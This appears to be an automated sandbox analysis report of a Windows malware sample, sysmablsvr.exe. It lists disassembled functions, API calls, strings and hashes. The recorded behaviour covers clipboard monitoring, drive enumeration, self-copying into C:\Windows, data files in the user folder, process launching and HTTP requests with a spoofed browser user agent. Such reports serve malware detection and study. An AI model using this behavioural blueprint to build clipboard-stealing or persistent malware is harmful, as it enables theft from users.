                                              control_flow_graph 191 405910-405932 GetWindowLongW 192 405934-40593b 191->192 193 405956-40595d 191->193 194 405941-405945 192->194 195 4059c7-4059d8 IsClipboardFormatAvailable 192->195 196 405986-40598c 193->196 197 40595f 193->197 202 405964-405981 SetClipboardViewer SetWindowLongW 194->202 203 405947-40594b 194->203 200 4059e3-4059ed IsClipboardFormatAvailable 195->200 201 4059da-4059e1 195->201 198 4059a6-4059aa 196->198 199 40598e-4059a4 SetWindowLongW 196->199 204 405b44-405b5d DefWindowProcA 197->204 205 4059c2 198->205 206 4059ac-4059bc SendMessageA 198->206 199->205 208 4059f8-405a02 IsClipboardFormatAvailable 200->208 209 4059ef-4059f6 200->209 207 405a0b-405a0f 201->207 202->204 210 405951 203->210 211 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 203->211 205->204 206->205 213 405a15-405a1f OpenClipboard 207->213 214 405adf-405ae3 207->214 208->207 212 405a04 208->212 209->207 210->204 211->204 212->207 213->214 217 405a25-405a36 GetClipboardData 213->217 215 405ae5-405af5 SendMessageA 214->215 216 405afb 214->216 215->216 216->204 218 405a38 217->218 219 405a3d-405a4e GlobalLock 217->219 218->204 220 405a50 219->220 221 405a55-405a66 219->221 220->204 222 405a68-405a6c 221->222 223 405a89-405a9c call 405630 221->223 224 405a9e-405aae call 405750 222->224 225 405a6e-405a72 222->225 231 405ab1-405ac5 GlobalUnlock CloseClipboard 223->231 224->231 227 405a74 225->227 228 405a76-405a87 call 405510 225->228 227->231 228->231 231->214 235 405ac7-405adc call 4048a0 call 40a740 231->235 235->214
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                              • SetClipboardViewer.USER32(?), ref: 00405968
                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                              • OpenClipboard.USER32(00000000), ref: 00405A17
                                              • GetClipboardData.USER32(00000000), ref: 00405A29
                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                              • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                              • String ID:
                                              • API String ID: 3549449529-0
                                              • Opcode ID: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction ID: 140c23de002baebc09e84a4b6840f2c6f62578de50faf7348504d1cb8e8204ab
                                              • Opcode Fuzzy Hash: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction Fuzzy Hash: 80710C75A00608EFDF14DFA4D988BAFB7B4EB48300F10856AE506B7290D7799A40CF69
                                              Function 00406B50 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106sleepthreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysmablsvr.exe,00000104), ref: 00406B70
                                                • Part of subcall function 0040ED00: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                                • Part of subcall function 0040ED00: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                                • Part of subcall function 0040ED00: CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              • ExitThread.KERNEL32 ref: 00406CDA
                                                • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                • Part of subcall function 00406340: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                • Part of subcall function 00406340: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                              • wsprintfW.USER32 ref: 00406C52
                                              • wsprintfW.USER32 ref: 00406C72
                                              • wsprintfW.USER32 ref: 00406C95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                              • String ID: (%dGB)$%s%s$C:\Windows\sysmablsvr.exe$Unnamed volume
                                              • API String ID: 1650488544-3576103414
                                              • Opcode ID: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction ID: 6971fabc066a78c2b5f4f93c2536245faf55c75ef939042e540841f18162a7fc
                                              • Opcode Fuzzy Hash: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction Fuzzy Hash: 1D419BB1900214BBE714DB94DD55FEE7778BB48700F1081A5F20AB61D0DA785794CF6A
                                              Function 00405820 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 00405838
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                              • Sleep.KERNEL32(00000001), ref: 00405864
                                              • GetTickCount.KERNEL32 ref: 0040586A
                                              • GetTickCount.KERNEL32 ref: 00405873
                                              • wsprintfW.USER32 ref: 00405886
                                              • RegisterClassExW.USER32(00000030), ref: 00405893
                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                              • TranslateMessage.USER32(?), ref: 004058E5
                                              • DispatchMessageA.USER32(?), ref: 004058EF
                                              • ExitThread.KERNEL32 ref: 00405901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                              • String ID: %x%X$0
                                              • API String ID: 716646876-225668902
                                              • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction ID: 26b7d68298067a6ce37e9ddfddb25a36523320ae21639d5819629e884720d218
                                              • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction Fuzzy Hash: 47212C71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69
                                              Function 0040ED50 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 40ed50-40ed8f CreateFileW 271 40ed95-40edb0 CreateFileMappingW 270->271 272 40eeaa-40eeae 270->272 273 40eea0-40eea4 CloseHandle 271->273 274 40edb6-40edcf MapViewOfFile 271->274 275 40eeb0-40eed0 CreateFileW 272->275 276 40ef04-40ef0a 272->276 273->272 277 40edd5-40edeb GetFileSize 274->277 278 40ee96-40ee9a CloseHandle 274->278 279 40eed2-40eef2 WriteFile CloseHandle 275->279 280 40eef8-40ef01 call 40a740 275->280 281 40edf1-40ee04 call 40cd80 277->281 282 40ee8c-40ee90 UnmapViewOfFile 277->282 278->273 279->280 280->276 281->282 287 40ee0a-40ee19 281->287 282->278 287->282 288 40ee1b-40ee3b call 40c720 287->288 290 40ee40-40ee4a 288->290 290->282 291 40ee4c-40ee77 call 40aa70 memcmp 290->291 291->282 294 40ee79-40ee85 call 40a740 291->294 294->282
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ED82
                                              • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EDA3
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EDC2
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EDDB
                                              • memcmp.NTDLL ref: 0040EE6D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EE90
                                              • CloseHandle.KERNEL32(00000000), ref: 0040EE9A
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEA4
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EEC3
                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EEE8
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEF2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                              • String ID:
                                              • API String ID: 3902698870-0
                                              • Opcode ID: bbc640bda5f038b51350de564496a7af1b726e9883d6f91e6a3899aa04c8a2da
                                              • Instruction ID: 4e6ec57638d856f2454fe90bbc3b1fbf5740e030230db4960ae301055fb20e21
                                              • Opcode Fuzzy Hash: bbc640bda5f038b51350de564496a7af1b726e9883d6f91e6a3899aa04c8a2da
                                              • Instruction Fuzzy Hash: 34515FB4E40208FBDB14DFA4CC49BDFB774AB48704F108569E615B72C0D7B9AA45CB98
                                              Function 0040D860 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 321 40d860-40d890 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 322 40d896-40d8aa InterlockedExchangeAdd 321->322 323 40d979-40d990 GetCurrentThread SetThreadPriority 321->323 322->323 324 40d8b0-40d8b9 322->324 325 40d8bc-40d8c3 324->325 325->323 326 40d8c9-40d8e4 EnterCriticalSection 325->326 327 40d8ef-40d8f7 326->327 328 40d937-40d94c LeaveCriticalSection 327->328 329 40d8f9-40d906 327->329 332 40d957-40d95d 328->332 333 40d94e-40d955 328->333 330 40d913-40d935 WaitForSingleObject 329->330 331 40d908-40d911 329->331 334 40d8e6-40d8ec 330->334 331->334 335 40d96c-40d974 Sleep 332->335 336 40d95f-40d968 332->336 333->323 334->327 335->325 336->335 337 40d96a 336->337 337->323
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0040D866
                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,00520638,000000FF), ref: 0040D86D
                                              • GetCurrentThread.KERNEL32 ref: 0040D878
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,00520638,000000FF), ref: 0040D87F
                                              • InterlockedExchangeAdd.KERNEL32(0040805F,00000000), ref: 0040D8A2
                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D8D7
                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D922
                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D93E
                                              • Sleep.KERNEL32(00000001), ref: 0040D96E
                                              • GetCurrentThread.KERNEL32 ref: 0040D97D
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F), ref: 0040D984
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                              • String ID:
                                              • API String ID: 3862671961-0
                                              • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction ID: d6bd3df3806ede59070add2f0d7a1f8bc277f5a62d9d5dceae4a540d753efef8
                                              • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction Fuzzy Hash: 80413CB4E00209EBDB14DFE4D848BAEBB75EF44305F10C16AE911A7390D7789A85CF59
                                              Function 0040B850 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00417F40,?,?,?,?,?,?,00407FE3), ref: 0040B85B
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B8AD
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B8CE
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B8ED
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B902
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B968
                                              • CloseHandle.KERNEL32(00000000), ref: 0040B972
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B97C
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Strings
                                              • C:\Users\user\tbtnds.dat, xrefs: 0040B8A8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                              • String ID: C:\Users\user\tbtnds.dat
                                              • API String ID: 439099756-3213863656
                                              • Opcode ID: 6e33ce8be33ea1410cfce0e5ca66737ed1c773acc2abebe2ac83ecac092f2b8c
                                              • Instruction ID: 20bf7a335d7b83d19979346108b4db2f5a5138f5ba8950715db26485b9768e75
                                              • Opcode Fuzzy Hash: 6e33ce8be33ea1410cfce0e5ca66737ed1c773acc2abebe2ac83ecac092f2b8c
                                              • Instruction Fuzzy Hash: 84413AB4E40308ABDB10DFA4CC4AFAEB774EB04704F208569E611BA2D1C7B96641CB9D
                                              Function 00405B60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 384 405b60-405b92 InitializeCriticalSection CreateFileW 385 405c85-405c88 384->385 386 405b98-405bb3 CreateFileMappingW 384->386 387 405bb9-405bd2 MapViewOfFile 386->387 388 405c7b-405c7f CloseHandle 386->388 389 405c71-405c75 CloseHandle 387->389 390 405bd8-405bea GetFileSize 387->390 388->385 389->388 391 405bed-405bf1 390->391 392 405bf3-405bfa 391->392 393 405c67-405c6b UnmapViewOfFile 391->393 394 405bfc 392->394 395 405bfe-405c11 call 40cdb0 392->395 393->389 394->393 398 405c13 395->398 399 405c15-405c2a 395->399 398->393 400 405c3a-405c65 call 405c90 399->400 401 405c2c-405c38 call 40a740 399->401 400->391 401->393
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(004174D8,?,?,?,?,?,00407FAD), ref: 00405B6B
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407FAD), ref: 00405B85
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                              • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                              • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                              Strings
                                              • C:\Users\user\tbtcmds.dat, xrefs: 00405B80
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                              • String ID: C:\Users\user\tbtcmds.dat
                                              • API String ID: 3956458805-1042172597
                                              • Opcode ID: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction ID: 3caee3762cbdbcce4f49fb41099d7db393733e6e5b5fc44a0020794708857aa0
                                              • Opcode Fuzzy Hash: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction Fuzzy Hash: 51313D74A40308EBEB10DBA4CC4ABAFB774EB44704F208569E601772D0D7B96A81CF99
                                              Function 0040EF10 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 406 40ef10-40ef70 memset * 2 CreateProcessW 407 40ef81-40efa5 ShellExecuteW 406->407 408 40ef72-40ef7f Sleep 406->408 409 40efb6 407->409 410 40efa7-40efb4 Sleep 407->410 411 40efb8-40efbb 408->411 409->411 410->411
                                              APIs
                                              • memset.NTDLL ref: 0040EF1E
                                              • memset.NTDLL ref: 0040EF2E
                                              • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EF67
                                              • Sleep.KERNEL32(000003E8), ref: 0040EF77
                                              • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EF92
                                              • Sleep.KERNEL32(000003E8), ref: 0040EFAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction ID: 2af3465f2ac7e3bdaf7f942b51208d096d5e25dcc258d3f6adac25a8060dddc3
                                              • Opcode Fuzzy Hash: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction Fuzzy Hash: 6F114F71A84308BBEB10DB90DD46FDE7778AB14B00F204125FA09BE2C1D7F56A44C75A
                                              Function 0040DE20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 412 40de20-40de3a 413 40de4b-40de52 412->413 414 40df04-40df0d 413->414 415 40de58-40de77 recvfrom 413->415 416 40de86-40dea3 StrCmpNIA 415->416 417 40de79-40de84 Sleep 415->417 419 40dea5-40dec4 StrStrIA 416->419 420 40deff 416->420 418 40de3c-40de45 417->418 418->413 419->420 421 40dec6-40defd StrChrA call 40ce30 419->421 420->418 421->420
                                              APIs
                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                              • Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleeprecvfrom
                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                              • API String ID: 668330359-3973262388
                                              • Opcode ID: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction ID: cf4c7c589cb5a2b5626e628c2cbe2bc4730fcdb76fc9a6090f7a4287b0899cde
                                              • Opcode Fuzzy Hash: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction Fuzzy Hash: C92142B0944218ABDB20CB64DC49BE97774AB14308F1085E9E7197B2C0D7B99ACACF5C
                                              Function 0040EFC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 424 40efc0-40efe4 InternetOpenA 425 40efe6-40f003 InternetOpenUrlA 424->425 426 40f058-40f069 Sleep 424->426 427 40f005-40f02c HttpQueryInfoA 425->427 428 40f04e-40f052 InternetCloseHandle 425->428 429 40f044-40f048 InternetCloseHandle 427->429 430 40f02e-40f036 427->430 428->426 429->428 430->429 431 40f038-40f040 430->431 431->429
                                              APIs
                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EFD7
                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EFF6
                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F01F
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F048
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F052
                                              • Sleep.KERNEL32(000003E8), ref: 0040F05D
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EFD2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 2743515581-2272513262
                                              • Opcode ID: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction ID: b5bc459e60af10a5ecd3bce89b92fe6334010ad2bd78cd38f87cd536e4e3c5ce
                                              • Opcode Fuzzy Hash: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction Fuzzy Hash: 6821FC74A40208FBDB20DF94CC49FDEB775AB44705F1085A5FA11AB2C1C7B96A44CB59
                                              Function 0040B110 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B1A8
                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B1C9
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B1D3
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B1DD
                                              • InterlockedExchange.KERNEL32(00416900,0000003D), ref: 0040B1EA
                                              Strings
                                              • C:\Users\user\tbtnds.dat, xrefs: 0040B1A3
                                              Memory Dump Source
